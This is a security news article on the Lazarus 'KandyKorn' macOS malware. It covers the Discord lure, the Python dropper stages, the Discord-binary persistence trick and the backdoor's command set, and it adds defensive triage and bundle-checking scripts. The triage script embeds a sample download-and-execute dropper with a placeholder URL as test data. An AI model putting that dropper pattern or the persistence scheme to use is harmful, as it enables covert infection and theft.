New macOS 'KandyKorn' malware targets cryptocurrency engineers

A new piece of macOS malware called 'KandyKorn' has been detected in a campaign attributed to the North Korean hacking group Lazarus, targeting blockchain engineers at a cryptocurrency exchange.

Attackers impersonate members of the cryptocurrency community in Discord channels to spread Python-based modules that trigger a multi-stage KandyKorn infection chain.

Elastic Security discovered the attacks and attributed them to Lazarus based on overlaps with previous campaigns: the techniques used, the network infrastructure, the code-signing certificates, and hits on Elastic's custom Lazarus detection rules.

Targeting the crypto community

The attack begins on Discord with social engineering that tricks the target into downloading a malicious ZIP archive called 'Cross-platform Bridges.zip'.

The victim is tricked into believing that they are downloading a legitimate arbitrage bot designed for automated generation of profits from cryptocurrency transactions.

Instead, the contained Python script ('Main.py') will import 13 modules from an equal number of scripts in the ZIP, launching the first payload, 'Watcher.py'.

Python scripts in the ZIP (Elastic)

Watcher.py is a downloader that unzips and runs a second Python script called 'testSpeed.py' along with another Python file called 'FinderTools', downloaded from a Google Drive URL.

FinderTools is a dropper that retrieves and launches an obfuscated binary called 'SugarLoader', which appears on disk under two names, as the '.sld' and '.log' Mach-O executables.

SugarLoader establishes a connection to the command and control (C2) server to obtain the final payload, KandyKorn, and loads it directly into memory using reflective binary loading, so the payload never has to be written to disk as a separate file.
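The Python stages described above (a Main.py that pulls in sibling modules, a Watcher.py that fetches a further script from a Google Drive URL and spawns it) are exactly the traits a static triage pass can surface before anyone runs an "arbitrage bot" from a Discord download. The script below is an added example written for this article, not Elastic's tooling or the malware's code: it parses a Python file with the standard `ast` module, separates imports of scripts shipped inside the archive from library imports, flags modules commonly used for download-and-execute behaviour, and lists URL literals and process-spawning calls. The sample script and archive member list are constructed stand-ins with a placeholder URL, not the real Watcher.py.

```python
import ast
import re
from typing import Dict, List, Sequence

# Constructed sample in the style of a dropper stage; the URL is a placeholder.
SAMPLE_ARCHIVE_MEMBERS = ["Main.py", "Watcher.py", "testSpeed.py"]
SAMPLE_SCRIPT = '''
import os
import zipfile
import urllib.request
import subprocess
import Watcher
from . import testSpeed

URL = "https://drive.google.com/uc?id=PLACEHOLDER"

def fetch():
    data = urllib.request.urlopen(URL).read()
    with open("/tmp/payload.zip", "wb") as f:
        f.write(data)
    zipfile.ZipFile("/tmp/payload.zip").extractall("/tmp/out")
    subprocess.Popen(["python3", "/tmp/out/testSpeed.py"])
'''

# Library modules that a "trading bot" has little reason to combine.
SUSPICIOUS_MODULES = {"urllib.request", "requests", "subprocess", "zipfile",
                      "ctypes", "base64", "socket"}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def triage(source: str, archive_members: Sequence[str] = ()) -> Dict[str, List[str]]:
    """Statically summarise one Python file; the source is parsed, never executed.

    archive_members: file names found in the ZIP, so that 'import Watcher' is
    recognised as a sibling script rather than a library."""
    tree = ast.parse(source)
    stems = {m[:-3] for m in archive_members if m.endswith(".py")}
    imports: List[str] = []      # library modules
    local: List[str] = []        # scripts shipped in the same archive
    urls: List[str] = []
    spawns: List[str] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                target = local if alias.name.split(".")[0] in stems else imports
                target.append(alias.name)
        elif isinstance(node, ast.ImportFrom):
            module = node.module or ""
            if node.level > 0:                       # relative import: sibling script
                local.extend(a.name for a in node.names)
            elif module.split(".")[0] in stems:
                local.append(module)
            else:
                imports.append(module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.extend(URL_RE.findall(node.value))   # hard-coded download locations
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            base = node.func.value
            if isinstance(base, ast.Name) and base.id == "subprocess":
                spawns.append(f"subprocess.{node.func.attr}")
            elif isinstance(base, ast.Name) and base.id == "os" \
                    and node.func.attr in {"system", "popen", "execv", "execvp"}:
                spawns.append(f"os.{node.func.attr}")
    return {
        "imports": imports,
        "local_modules": local,
        "suspicious": sorted(set(imports) & SUSPICIOUS_MODULES),
        "urls": urls,
        "spawns": spawns,
    }


if __name__ == "__main__":
    for key, values in triage(SAMPLE_SCRIPT, SAMPLE_ARCHIVE_MEMBERS).items():
        print(f"{key:14s} {values}")
```

Run it over every .py in the archive before execution; a script that imports a dozen sibling modules, carries a file-sharing URL and calls subprocess is the shape of the chain above, whatever its README promises.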

Lazarus attack chain diagram (Elastic)

macOS persistence trick

In the final stage of the attack, a loader known as HLoader is used. It impersonates the legitimate Discord application and is code-signed in the same way as binaries seen in previous Lazarus macOS campaigns.

HLoader establishes persistence for SugarLoader by hijacking the real Discord app on the infected system through a series of binary renaming operations, so that every user launch of Discord also runs the loader.

"We observed that the threat actor adopted a technique we have never seen used before to achieve persistence on macOS, known as execution stream hijacking," Elastic explains.

Specifically, HLoader, which sits in Discord's place on disk, performs the following operations upon launch:

  • Renames itself from Discord to MacOS.tmp
  • Renames the legitimate Discord binary from .lock back to Discord
  • Runs both Discord (the real app) and .log (SugarLoader) using NSTask.launchAndReturnError
  • Renames both files back to their initial names, leaving the loader in Discord's place for the next launch

File renaming scheme used for persistence (Elastic)
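The renaming sequence above leaves a recognisable footprint inside the Discord bundle: a '.lock' file (the real binary), a '.log' file (SugarLoader), and, if the loader is caught mid-swap, a 'MacOS.tmp'. The following script is an added example written for this article, not an Elastic detection rule or any vendor tool: it walks Discord.app/Contents/MacOS, reports any of those artifact names (plus '.sld', the other SugarLoader name), checks that the file named 'Discord' still starts with a Mach-O magic number, and, where Apple's `codesign` tool is available, runs a signature verification. The `build_sample_bundle` helper fabricates a throwaway bundle skeleton for demonstration; it is constructed test data, not a real Discord install.

```python
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import List, Optional

# File names from the renaming sequence, plus the two names SugarLoader uses.
ARTIFACT_NAMES = {".lock", ".log", ".sld", "MacOS.tmp"}

# Magic numbers of thin (32/64-bit, either byte order) and fat Mach-O images.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}


def check_discord_bundle(app_path: str) -> List[str]:
    """Return a list of findings for a Discord.app bundle; empty means no artifact seen."""
    macos_dir = Path(app_path) / "Contents" / "MacOS"
    if not macos_dir.is_dir():
        return [f"{macos_dir} is missing"]
    findings: List[str] = []
    for entry in sorted(macos_dir.iterdir()):
        if entry.name in ARTIFACT_NAMES:
            findings.append(f"unexpected file in bundle: {entry.name}")
    main_exe = macos_dir / "Discord"
    if not main_exe.is_file():
        findings.append("main executable 'Discord' is missing")
    elif main_exe.read_bytes()[:4] not in MACHO_MAGICS:
        findings.append("main executable 'Discord' is not a Mach-O image")
    return findings


def codesign_ok(app_path: str) -> Optional[bool]:
    """Run Apple's signature verifier if present; None when codesign is unavailable."""
    if shutil.which("codesign") is None:
        return None
    result = subprocess.run(
        ["codesign", "--verify", "--deep", "--strict", app_path],
        capture_output=True,
    )
    return result.returncode == 0


def build_sample_bundle(infected: bool) -> str:
    """Create a throwaway Discord.app skeleton in a temp dir (constructed data).

    With infected=True it mimics the resting state after the swap: the loader
    poses as 'Discord' while the real app ('.lock') and SugarLoader ('.log')
    sit beside it. The executables are 32-byte stubs carrying a Mach-O magic."""
    root = Path(tempfile.mkdtemp()) / "Discord.app"
    macos_dir = root / "Contents" / "MacOS"
    macos_dir.mkdir(parents=True)
    stub = b"\xcf\xfa\xed\xfe" + b"\x00" * 28
    (macos_dir / "Discord").write_bytes(stub)
    if infected:
        (macos_dir / ".lock").write_bytes(stub)
        (macos_dir / ".log").write_bytes(stub)
    return str(root)


if __name__ == "__main__":
    for label, infected in (("clean", False), ("tampered", True)):
        path = build_sample_bundle(infected)
        print(label, check_discord_bundle(path), "codesign:", codesign_ok(path))
```

Treat the file-layout check as the primary signal: the page notes that HLoader is itself code-signed, so a bundle whose signature verifies is not by itself a clean bill of health, and a signature failure on a real install is worth a look even without the dotfiles.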

KandyKorn

KandyKorn is an advanced late-stage payload that allows Lazarus to access and steal data from the infected computer.

It runs in the background as a daemon, waiting for commands from the C2 server; it sends no heartbeats of its own, which minimises its network footprint on the system.

KandyKorn supports the following 16 commands:

  1. 0xD1: Terminate the program.
  2. 0xD2: Collect system information.
  3. 0xD3: List the contents of a directory.
  4. 0xD4: Parse directory properties.
  5. 0xD5: Upload files from the C2 to the victim's computer.
  6. 0xD6: Exfiltrate victim files to the C2.
  7. 0xD7: Archive and exfiltrate directories.
  8. 0xD8: Securely delete files by overwriting them with zeros.
  9. 0xD9: List all running processes.
  10. 0xDA: Kill a specific process.
  11. 0xDB: Execute system commands through a pseudoterminal.
  12. 0xDC: Retrieve the command outputs.
  13. 0xDD: Start an interactive shell.
  14. 0xDE: Retrieve the current configuration.
  15. 0xDF: Update the C2 configuration.
  16. 0xE0: Pause operations temporarily.

KandyKorn command execution code (Elastic)

In short, KandyKorn is a particularly stealthy backdoor capable of retrieving data, listing directories, uploading and downloading files, securely deleting files, terminating processes, and executing commands.

The cryptocurrency sector remains a primary target for Lazarus, and campaigns such as this one are motivated by financial gain rather than espionage, the group's other main operational focus.

The existence of KandyKorn underscores that macOS is within Lazarus' target range, showing the threat group's remarkable ability to create sophisticated, discreet malware designed for Apple computers.
